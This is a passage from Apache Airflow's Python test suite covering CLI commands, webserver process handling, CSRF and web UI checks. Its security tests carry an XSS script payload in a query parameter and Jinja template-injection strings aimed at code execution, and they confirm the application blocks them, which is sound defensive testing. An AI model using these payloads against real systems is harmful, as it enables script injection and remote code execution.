dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, six.string_types))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = models.TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=models.DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
@mock.patch("airflow.settings.RBAC", True)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
self.appbuilder.sm.sync_roles.assert_called_once()
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
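        # Helper: make the patched DagBag return exactly the given DAGs.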
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
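        # Pull [conn_id, conn_type] pairs out of the tabulated output; data rows land on
        # every other line, so header and separator lines are skipped.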
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:******@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:******@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existent connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_delete_dag_existing_file(self):
# Test to check that the DAG should be deleted even if
# the file containing it is not deleted
DM = DagModel
key = "my_dag_id"
session = settings.Session()
with tempfile.NamedTemporaryFile() as f:
session.add(DM(dag_id=key, fileloc=f.name))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables(self.parser.parse_args([
'variables', '-s', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables(self.parser.parse_args([
'variables', '-s', 'list', '["oops"]']))
# Set str
cli.variables(self.parser.parse_args([
'variables', '-s', 'str', 'hello string']))
# Set int
cli.variables(self.parser.parse_args([
'variables', '-s', 'int', '42']))
# Set float
cli.variables(self.parser.parse_args([
'variables', '-s', 'float', '42.0']))
# Set true
cli.variables(self.parser.parse_args([
'variables', '-s', 'true', 'true']))
# Set false
cli.variables(self.parser.parse_args([
'variables', '-s', 'false', 'false']))
# Set none
cli.variables(self.parser.parse_args([
'variables', '-s', 'null', 'null']))
# Export and then import
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables3.json']))
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
class TestCliWebServer(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.parser = cli.get_parser()
def setUp(self):
self._check_processes()
self._clean_pidfiles()
def tearDown(self):
self._check_processes()
self._clean_pidfiles()
def _check_processes(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
exit_code_pgrep_webserver = subprocess.Popen(["pgrep", "-c", "-f", "airflow webserver"]).wait()
exit_code_pgrep_gunicorn = subprocess.Popen(["pgrep", "-c", "-f", "gunicorn"]).wait()
if exit_code_pgrep_webserver != 1 or exit_code_pgrep_gunicorn != 1:
subprocess.Popen(["ps", "-ax"]).wait()
if exit_code_pgrep_webserver != 1:
subprocess.Popen(["pkill", "-9", "-f", "airflow webserver"]).wait()
if exit_code_pgrep_gunicorn != 1:
subprocess.Popen(["pkill", "-9", "-f", "gunicorn"]).wait()
raise AssertionError(
"Background processes are running that prevent the test from passing successfully."
)
def _clean_pidfiles(self):
pidfile_webserver = cli.setup_locations("webserver")[0]
pidfile_monitor = cli.setup_locations("webserver-monitor")[0]
if os.path.exists(pidfile_webserver):
os.remove(pidfile_webserver)
if os.path.exists(pidfile_monitor):
os.remove(pidfile_monitor)
def _wait_pidfile(self, pidfile):
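        # Poll until the pid file can be read as an integer, giving up after about a minute.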
start_time = time()
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception: # pylint: disable=broad-except
                if time() - start_time > 60:
raise
sleep(1)
def test_cli_webserver_foreground(self):
with mock.patch.dict(
"os.environ",
AIRFLOW__CORE__DAGS_FOLDER="/dev/null",
AIRFLOW__CORE__LOAD_EXAMPLES="False",
AIRFLOW__WEBSERVER__WORKERS="1"
):
# Run webserver in foreground and terminate it.
proc = subprocess.Popen(["airflow", "webserver"])
self.assertEqual(None, proc.poll())
# Wait for process
sleep(10)
# Terminate webserver
proc.terminate()
with timeout(60):
# -15 - the server was stopped before it started
# 0 - the server terminated correctly
self.assertIn(proc.wait(), (-15, 0))
def test_cli_webserver_foreground_with_pid(self):
with TemporaryDirectory(prefix='tmp-pid') as tmpdir:
pidfile = "{}/pidfile".format(tmpdir)
with mock.patch.dict(
"os.environ",
AIRFLOW__CORE__DAGS_FOLDER="/dev/null",
AIRFLOW__CORE__LOAD_EXAMPLES="False",
AIRFLOW__WEBSERVER__WORKERS="1"
):
proc = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
self.assertEqual(None, proc.poll())
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
proc.terminate()
with timeout(60):
self.assertEqual(0, proc.wait())
def test_cli_webserver_background(self):
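        # Start the webserver as a daemon, check that gunicorn and its monitor come up,
        # then terminate the monitor and verify that everything shuts down cleanly.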
import psutil
with TemporaryDirectory(prefix="gunicorn") as tmpdir, \
mock.patch.dict(
"os.environ",
AIRFLOW__CORE__DAGS_FOLDER="/dev/null",
AIRFLOW__CORE__LOAD_EXAMPLES="False",
AIRFLOW__WEBSERVER__WORKERS="1"):
pidfile_webserver = "{}/pidflow-webserver.pid".format(tmpdir)
pidfile_monitor = "{}/pidflow-webserver-monitor.pid".format(tmpdir)
stdout = "{}/airflow-webserver.out".format(tmpdir)
stderr = "{}/airflow-webserver.err".format(tmpdir)
logfile = "{}/airflow-webserver.log".format(tmpdir)
try:
# Run webserver as daemon in background. Note that the wait method is not called.
proc = subprocess.Popen([
"airflow",
"webserver",
"--daemon",
"--pid", pidfile_webserver,
"--stdout", stdout,
"--stderr", stderr,
"--log-file", logfile,
])
self.assertEqual(None, proc.poll())
pid_monitor = self._wait_pidfile(pidfile_monitor)
self._wait_pidfile(pidfile_webserver)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(
0, subprocess.Popen(["pgrep", "-f", "-c", "airflow webserver --daemon"]).wait()
)
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "-f", "gunicorn: master"]).wait())
# Terminate monitor process.
proc = psutil.Process(pid_monitor)
proc.terminate()
with timeout(120):
self.assertIn(proc.wait(), (0, None))
self._check_processes()
except Exception:
# List all logs
subprocess.Popen(["ls", "-lah", tmpdir]).wait()
# Dump all logs
subprocess.Popen(["bash", "-c", "ls {}/* | xargs -n 1 -t cat".format(tmpdir)]).wait()
raise
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.GunicornMonitor._get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
@conf_vars({('webserver', 'authenticate'): 'False', ('core', 'expose_config'): 'True'})
class SecurityTests(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = BeautifulSoup(response.data, 'html.parser')
return tree.find('input', attrs={'name': '_csrf_token'})['value']
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
# an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertNotIn("<script>alert(123456)</script>", response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
@conf_vars({('webserver', 'authenticate'): 'False', ('core', 'expose_config'): 'True'})
class WebUiTests(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&amp;")
